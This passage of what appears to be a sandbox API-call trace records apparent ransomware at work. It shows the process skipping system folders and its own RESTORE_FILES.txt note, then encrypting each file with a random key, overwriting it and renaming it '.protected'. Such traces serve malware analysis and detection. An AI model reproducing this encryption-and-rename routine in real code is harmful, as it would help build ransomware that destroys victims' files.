(lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".rar") returned 0x0 [0067.950] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll") returned 73 [0067.950] StrStrW (lpFirst="OUTLLIBR.REST.trx_dll", lpSrch=".zip") returned 0x0 [0067.950] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.978] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0067.978] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0067.987] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0067.987] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.000] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.000] CloseHandle (hObject=0xd8) returned 1 [0068.001] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected") returned 83 [0068.001] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLLIBR.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outllibr.rest.trx_dll.protected")) returned 1 [0068.001] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Windows") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.001] lstrcmpiW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.001] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.001] StrStrIW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.001] lstrcmpW (lpString1="OUTLWVW.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.001] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.001] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.001] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.002] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll") returned 71 [0068.002] StrStrW (lpFirst="OUTLWVW.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.002] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.018] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.018] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.019] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.019] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.019] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.019] CloseHandle (hObject=0xd8) returned 1 [0068.020] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected") returned 81 [0068.020] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\OUTLWVW.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\outlwvw.dll.trx_dll.protected")) returned 1 [0068.020] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.020] lstrcmpiW (lpString1="PPINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.020] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.020] StrStrIW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.020] lstrcmpW (lpString1="PPINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.020] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.020] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.020] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.021] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll") returned 70 [0068.021] StrStrW (lpFirst="PPINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.021] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.029] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.029] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.030] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.030] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.034] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.034] CloseHandle (hObject=0xd8) returned 1 [0068.043] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected") returned 80 [0068.043] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.dll.trx_dll.protected")) returned 1 [0068.043] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Windows") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.043] lstrcmpiW (lpString1="PPINTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.043] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.043] StrStrIW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.043] lstrcmpW (lpString1="PPINTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.043] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.044] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.044] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.044] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll") returned 71 [0068.044] StrStrW (lpFirst="PPINTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.044] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.055] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.055] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.056] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.056] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.057] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.058] CloseHandle (hObject=0xd8) returned 1 [0068.058] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected") returned 81 [0068.058] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PPINTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\ppintl.rest.trx_dll.protected")) returned 1 [0068.059] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Windows") returned -1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.059] lstrcmpiW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.059] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.059] StrStrIW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.059] lstrcmpW (lpString1="PUB6INTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.059] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.059] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.059] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.059] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.059] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.060] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.060] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.060] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll") returned 72 [0068.060] StrStrW (lpFirst="PUB6INTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.060] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.061] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.061] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.061] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.062] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.065] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.065] CloseHandle (hObject=0xd8) returned 1 [0068.065] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected") returned 82 [0068.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.dll.trx_dll.protected")) returned 1 [0068.066] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Windows") returned -1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.066] lstrcmpiW (lpString1="PUB6INTL.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.066] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrIW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".protected") returned 0x0 [0068.066] lstrcmpW (lpString1="PUB6INTL.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.066] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0068.066] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.066] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".txt") returned 0x0 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".rar") returned 0x0 [0068.066] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll") returned 73 [0068.066] StrStrW (lpFirst="PUB6INTL.REST.trx_dll", lpSrch=".zip") returned 0x0 [0068.067] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.073] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.073] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.074] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.074] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0068.078] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.078] CloseHandle (hObject=0xd8) returned 1 [0068.079] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected") returned 83 [0068.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUB6INTL.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\1036\\pub6intl.rest.trx_dll.protected")) returned 1 [0068.079] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Windows") returned -1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="Program Files (x86)") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.079] lstrcmpiW (lpString1="PUBWZINT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0068.079] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\1036\\PUBWZINT.REST.trx_dll") returned 73 [0068.079] StrStrIW (lpFirst="PUBWZINT.REST.trx_dll", lpSrch=".protected") returned 0x0 